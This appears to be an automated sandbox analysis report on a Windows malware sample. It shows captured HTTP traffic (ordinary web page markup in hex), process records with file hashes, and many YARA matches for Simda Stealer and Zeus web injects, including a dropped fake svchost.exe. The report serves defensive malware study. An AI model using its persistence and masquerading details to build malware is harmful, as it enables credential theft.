                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1950168&cwnd=251&unsent_bytes=0&cid=2e518d260b9bfe55&ts=1422&x=0"
                                                                                                                                                                                                            2024-11-11 17:08:09 UTC279INData Raw: 37 63 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c1c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-11-11 17:08:09 UTC1369INData Raw: 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31
                                                                                                                                                                                                            Data Ascii: rset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:1
                                                                                                                                                                                                            2024-11-11 17:08:09 UTC1369INData Raw: 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b
                                                                                                                                                                                                            Data Ascii: ling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{
                                                                                                                                                                                                            2024-11-11 17:08:09 UTC1369INData Raw: 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74
                                                                                                                                                                                                            Data Ascii: 100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-t
                                                                                                                                                                                                            2024-11-11 17:08:09 UTC1369INData Raw: 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73
                                                                                                                                                                                                            Data Ascii: html-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;pos


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:12:07:33
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\uavINoSIQh.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\uavINoSIQh.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:98422C3DECE103DE16C166C7FBEA2F6C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:12:07:34
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:ACF1B66F47538D1828695BAE8D83EF23
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1742494940.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1945983887.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1993648247.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1973545656.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1951729466.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1727160280.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1989210596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1953838270.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1952570956.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1987381593.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1833788305.000000000E440000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1990556597.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1990141474.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1908832402.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1951475762.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1785353535.000000000E040000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992609044.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1986892750.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1990784725.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1973353596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1993059041.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1768859542.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1810638614.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963515369.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1973821759.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1986550806.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1972618902.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964073452.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1972290685.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1945209264.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1819357336.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1939680900.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1374033112.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1374033112.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1965323651.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1849125917.0000000004900000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1991341795.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964333284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2611248672.00000000024A6000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1987592676.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1936202051.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1877311393.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1994177586.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1972865082.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1779871289.000000000E2C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:12:08:10
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:12:08:10
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:12:08:10
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
